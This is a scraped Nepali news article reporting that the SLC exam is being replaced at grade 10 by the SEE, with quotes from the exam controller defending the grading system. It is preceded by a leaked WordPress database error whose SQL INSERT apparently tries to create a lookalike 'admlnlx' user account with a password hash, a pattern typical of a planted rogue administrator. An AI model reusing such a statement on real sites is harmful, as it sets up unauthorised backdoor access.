WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/YjZEfWuAb/gmpNSAC4o5NcMwPoVF0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-09 09:30:11', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १३ –
चैत महिना नजिकिएसँगै यो वर्ष एसएलसी हुने हो कि होइन भन्ने जिज्ञासा सबैमा बढेको छ । कतिपय अन्योलमा पनि छन् ।
यो अन्योल र जिज्ञासा हटाउन परीक्षा नियन्त्रण कार्यालयले यो वर्षदेखि एसएलसी परीक्षा नहुने स्पष्ट पारेको छ । एसएलसी नभए पनि यस्तै खालको परीक्षा भने हुनेछ, जसलाई एसईई भनिनेछ ।
पनिकाका नियन्त्रक अम्बिकाप्रसाद रेग्मीका अनुसार यो वर्षदेखि कक्षा १० माध्यमिक शिक्षा परीक्षा ९एसईई० हुनेछ । शिक्षा ऐनले स्कुल लिभिङ सर्टिफिकेट अर्थात् एसएलसीलाई कक्षा १२ मा सारेको छ किनभने अब कक्षा १२ सम्मलाई नै स्कुल मानिनेछ । कक्षा १० मा भने एसएलसीसरह नै एसईई हुनेछ ।
पछिल्लो पटक एसएलसी परीक्षाको नतिजा पहिलोपटक ग्रेडिङ प्रणालीबाट भएको थियो । त्यतिबेला विद्यार्थीहरूमा नतिजालाई लिएर जति उत्साह देखिएको थियो, त्यति नै द्विविधा र अन्योल पनि ।
एसईई प्रणालीले कक्षा १० का विद्यार्थीमा त्यस्तै अन्योल सिर्जना गर्ने कतिपयको तर्क छ । परीक्षा नियन्त्रक रेग्मी भने त्यस्तो नहुनेमा ढुक्क छन् । उनी भन्छन्, “यो वैज्ञानिक पद्धति हो । १०—१० जनाको सानो समूहमा विद्यार्थीको ग्रेडिङ गरिन्छ । विद्यालयका शिक्षक तथा विद्यार्थीमा एसईई प्रणालीलाई लिएर कुनै अन्योल भएजस्तो मलाई लाग्दैन ।”